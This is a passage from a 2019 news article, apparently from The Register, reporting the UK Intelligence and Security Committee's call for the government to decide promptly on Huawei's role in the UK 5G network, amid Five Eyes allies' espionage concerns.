Both PRISM surveillance-purveyor the US and Australia have banned the company from their 5G networks, voicing concern over the nature of Huawei’s relationship with the Chinese state and therefore the potential risk of espionage or sabotage.

Spy vs spy

On the subject of intelligence-sharing between the “Five Eyes partners” – the UK, US, Canada, Australia and New Zealand have a long-standing agreement – the ISC said the United States and Australia had already been vocal in their concern that the UK might employ Huawei within its 5G network. “We should emphasise that this is not about any risk to the communication channels which are used for intelligence exchange – these would always be kept entirely separate,” it said.

“However, the National Cyber Security Centre (NCSC) … has been clear that the security of the UK’s telecommunications network is not about one company or one country: the ‘flag of origin’ for telecommunications equipment is not the critical element in determining cyber security.

“The point being made in NCSC’s statements thus far appears to be that this is not about whether or not Huawei – or indeed any company – might wish to, or be instructed to, sabotage the UK network or use it to spy on the UK. It is that the UK network has to be built in such a way that it can withstand attack from any quarter – whether that be malicious action from someone within the network, a cyber attack from actors outside, or simple human effort.”

Brexit schmexit: make a call on 5G kit, for Pete’s sake

It concluded: “In terms of the immediate issue, restricting those companies who may be involved in our 5G network will have consequences: both in terms of time and cost. And the government must weigh these, together with the security advice that any risk posed could be managed in a secure system, against the geostrategic issues outlined above.


“It is important to take the right decision, and take it we must: this debate has been unnecessarily protracted and this has damaged our international relationships. The new prime minister will no doubt have many issues to deal with in his first days in office.

“Nevertheless, this committee urges him to take a decision on which companies will be involved in our 5G network, so that all concerned can move forward.” ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/07/19/excluding_huawei_from_5g_will_harm_security_mps_warn/